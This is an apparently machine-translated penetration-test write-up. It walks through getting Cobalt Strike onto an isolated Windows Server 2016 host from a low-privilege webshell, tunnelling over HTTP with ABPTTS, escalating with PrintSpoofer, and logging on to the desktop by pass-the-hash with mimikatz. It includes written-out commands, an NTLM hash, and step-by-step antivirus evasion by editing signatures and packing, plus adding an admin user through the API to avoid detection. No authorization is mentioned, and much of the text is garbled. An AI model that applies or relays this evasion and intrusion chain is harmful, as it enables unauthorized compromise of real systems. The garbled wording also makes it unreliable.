Foreword

This article is an intranet penetration record that uses unconventional means to break through security strategies.

Ambient description

Web-based getshell, webshell is ice scorpion, with permissions of .net, very low permissions, server is server 2016, and the target does not leave the network! is equipped with antivirus software (Tureng, Microsoft's WD), ASMI is enabled by default, and there are special policy restrictions on the power shell.Tcp, icmp, and DNS protocols are not connected, and it is impossible to directly establish a connection with the public network's Cs server. (The intranet's Cs server cannot establish a connection with it) The public network cannot access the target web service (pure intranet web service) The extremely strict inbound policy inbound rules: only http allows inbound, and only one 80 and 8080 two http ports can be accessed normally by intranet machines.

Outbound rules: Non-port 8080 ports are not allowed to communicate to the outside world.

I hand-drawn a topology diagram and just look at it.

Why should I go online cs

The webshell permissions are too low and are highly restrictive. Cs needs to be raised online, because Cs uses reflective DLL to load the PE program, so it can play a certain role in bypass when performing some sensitive operations, such as mimikatz password grabbing and other operations.

Like dumping LSA to local and then dumphash it won't work, because the webshell permissions are too low, and dumping LSA at least requires administrator permissions.

Moreover, the target network environment is relatively harsh. Any communications other than the http protocol will be intercepted by the firewall, and it is impossible to establish a shell with interactive functions normally.

Point 1: Use Pystinger reverse proxy to launch cs

After reviewing the relevant information, I found that most of the articles on the Internet use Pystinger to implement intranet reverse proxy, and use the http protocol to map the target machine port to the CSS server listening port, so that it can be launched on CSS without accessing the web service. However, there is a problem here. The public network Cs server cannot access the target web service. Only machines on the same intranet can access the target web service. Therefore, it is impossible to directly build a pystinger on the server to reverse proxy the target machine port to the public network Cs listening port.

The solution here is to directly build a CSS service on the machine and then perform pystinger anti-generation operation.

A local cs service is launched . Regularly configure the backup type listener, and the listening port 60020 (the 6002 in the figure above has less 0.) proxy.aspx is uploaded to the target server, access

4. Upload the stinger_server.exe to the target server and execute the command: start D:\stinger_server.exe 0.0.0.0

5. Local execution command of springboard machine: stinger_client -w http://10.1.1.1:8080/2.aspx-l 0.0.0.0 -p 4002

6. Remove the kill and handle the resever_bind, upload it to the target and execute it but it will not go online. After executing the tasklist, it will find that the shell.exe has been executed, but it will not go online, and pystinger reports an error.

The final result is that an error is reported. The specific reason is unknown. It may be that there is a problem with the target web environment or the problem with the backup type shell communication.

Therefore, Pystinger anti-generation launch failed.

Point 2: Forward proxy + forward shell online public network CS

Since the reverse proxy does not work, use the forward proxy and then use the forward shell to connect.

The target machine does not leave the network, and the target machine can be used as a springboard machine to bring out the forward shell of the target machine.

Schematic The common http tunneling tools Neo-reGeorg and reGeorg (these two should be used more often) can be used in most network environments, but it is not possible here. The springboard machine will be directly disconnected from the Cs server. The cs connect forward connection request is issued by the springboard machine's beacon. You can only proxy the beacon into the socks tunnel to enable the connect request to connect to the listening port of the forward shell. However, because the target machine does not leave the network, after the springboard machine's beacon enters the proxy tunnel, it cannot connect to the Cs server on the public network, so it can only be port-to-port mapping, and cannot use the http protocol to build the socks tunnel (I guess). So here will use ABPTTS for http tunnel construction.

Advantages of ABPTTS

Excellent adversarial feature detection

The tunnel created is very stable

1. Configure abptts:

python abpttsfactory.py -o server \\ Generate server scripts and initialize them.

2. Upload server script to target machine

Point Three: File Upload

In this place, Ice Scorpion and Malaysia cannot upload files. They can only use Godzilla's large file upload to upload abptts.aspx (the subsequent exe upload also uses Godzilla's large file upload function) The exe file is also a pitfall. In normal environment, we can use certutil, powershell and other methods to download the exe to the target, but this machine does not leave the network. Due to the outbound rules, it cannot even access the web servers of other machines in the intranet. Finally, Godzilla's large file upload was solved.

The address of abptts.aspx after uploading is completed: http://10.1.1.1:8080/abptts.aspx

Visit abptts.aspx, and the page echoes a long list of ciphertexts to indicate that the abptts client is normal

3. Start http tunnel

Python abpttsclient.py -c server/config.txt -u 'http://10.1.1.1:8080/abptts.aspx'-f 127.0.0.1:7777/127.0.0.1:1111

Here, 127.0.0.1:7777 is the native port, and 127.0.0.1:1111 is the port of the target machine.

It means that the target machine's 1111 port is mapped to the local port 7777 through the http tunnel, and all requests you send to the local port 7777 will be forwarded to the target machine's 1111 port.

Point 4: Forward Bind is not killed

Front shell introduction of Cs (beacon tcp)

The principle of forward shell is that bind opens a listening port on the target machine, waiting for other hosts to access this listening port, and the child Beacon accepts the request from the parent Beacon, rather than directly communicating with the cs server.

The reverse shell creates a forward listener by the target initiating a request to access the listening port of the cs server generates a forward load (stageless Beacon can only be selected when generating a forward load)

Why use a forward shell:

If the target machine's outbound rules are very strict and the target does not leave the network, the reverse shell cannot maintain communication with the cs server normally in this case.

If a forward shell is adopted, no matter how strict its inbound rules are, it will not block communication between local ports, so that the strict inbound rules policy can be bypassed. Communication process: Cs server (public network)--springboard machine (parent baecon)--port 7777--target port 8080 (http tunnel)--target port 11111 (child baecon) Bypass analysis In the target machine's firewall, the local port 8080 communicates with the local port 1111, while the attack machine and the target port 8080 are normally allowed to interact, thus passing the inbound and exit policy.

Forward Bind-free

It is mentioned above that there are two antiviruses, Turquoise and WD, and uploading the forward shell directly will definitely be killed instantly. Local tests will report the poison.

Reserver_Bind is relatively simple to avoid killing. It directly generates shellcode and loads shellcode by separating free killing and other methods.

However, the forward shell cannot generate shellcode. It belongs to the stageless Beacon, and the stageless Beacon cannot generate shellcode, so it cannot bypass the anti-virus through the regular separation of kills.

Let me mention the difference between stager and stagerless:

stager and stagerless beaconStager type: only contains simple load logic parts. The stager loads the payload of c2 into memory to achieve pe loading. This loading method is reflective DLL loading. Stagerless type: The entire writing of stager+payload is in the Trojan horse, which is larger in size and more obvious in the Stager type. As can be seen from the figure below, there is no forward bind listener option when generating payload, only the Reserve listener option.

Since it is impossible to avoid killing by obfuscating the loader method, then strengthen the shell + positioning feature code method to avoid killing. Most domestic anti-virus software is estimated to be based on feature code searches and killing based on fuzzy hash algorithms. Strong obfuscation of the code layer can almost bypass most anti-viruses, strong shells (ASPack, upx, Safengine, VMPoject, the actual test Aspack and upx are not very effective). Main tools used: VirTest5.0+Resource Hacker+SafengineShielden+upxVirTest5.0:

Automatic positioning of feature codes. Because they cannot assemble, they directly use 010Editor to modify the hexadecimal system of the feature code to break the loop feature code.

Other methods to modify feature codes : Replace assembly functions, change instruction order, and zero jump.

Note: After modifying the feature code, you need to test whether the exe can still run normally. SafengineShielden

Select anti-LPK injection, anti-debugger attachment, anti-memory dump, and full complexity, and do not check the virtual machine detection.

Finally, add a layer of upx shell (upx shell depends on the situation, sometimes adding upx shell will cause killing), Resource Hacker adds an arbitrary icon file, and successfully passes the turtle.

The target machine runs forward shell

Upload the forward bind and execute D:/beacon_se.exe on the ice scorpion. You can see that the Trojan opens port 1111 on the target machine. We use the http tunnel to connect to the forward bind located on port 11111 on the target machine.

This machine (springboard) forward connection shell

Native (attacker) goes online as a springboard machine, and then executes it in the native shell

connect 127.0.0.1 7777

Successfully launched forward 10.1.1.1, but the permissions of the online shell are extremely low, and mimikatz cannot run. Because of the forward shell, even if the right lift is successful, the shell cannot be directly rebounded. Moreover, because the target system is 2016, common escalation scripts in plug-ins will fail to escalate.

PrintSpoofer escalation

Upload PrintSpoofer.exe to the target host.

Execute the following command to run my forward shell with system permissions, then I will get a shell with system permissions instead of the low permissions shell of asp.

C:\Windows\Temp\PrintSpoofer -c D:/1111_se.exe

Netstat -ano confirms whether there is a 1111 port open locally.

The forward shell is running normally, and the springboard machine is connected to the forward bind again.

connect 127.0.0.1 7777

The power was successfully raised, and the battle was basically over. The system permissions were obtained. Mimikatz grabbed the password, but there was no clear text, but he could get the hash.

Bypass antivirus and add user login to desktop

Net1 changed its name and added a user. If an error is reported, it must have been intercepted by Turfur. The killer directly drives the layer to kill softly.

Local experiments can be eliminated, but I don’t know why it cannot be achieved in terms of goals. Change the idea: Domestic antivirus interception and other antivirus interception and user commands are often only targeted at the two processes of net and net1, and there is no hook underlying function, so we just need to directly call the underlying function without executing net and net1 to bypass the antivirus monitoring. The principle is not analyzed in depth, there are articles on the Internet.

Adding Administrator Users in Windows API

Project address: https://github.com/newsoft/adduser

Bypassing the antivirus, a user was added. The next step was to regular operations, use the printer vulnerability to increase permissions, and use the sys permission to switch to the desktop of the adminsitrator user. hash pass attack

Or it is a hash pass, and it is directly on the adminsitrator desktop. sekurlsa:pth /user:Administrator /domain:Username /ntlm:194f34439dd27846db00c6723036da6b '/run:mstsc.exe /restrictedadmin'194f34439dd27846db00c6723036da6b

The advantage of Hash delivery is that it has less movement and no new users are needed, and fewer traces are left, reducing the probability of attackers being discovered. As shown in the figure below

Just like the above operation, reverse proxy the other party's port 3389 to the local area and connect it.

Finally, I attached a screenshot of the logged-in desktop. When I logged in, I reported an error from a backstab. This just explains why I didn’t kill successfully when I was drying turtle (it crashed due to program compatibility issues).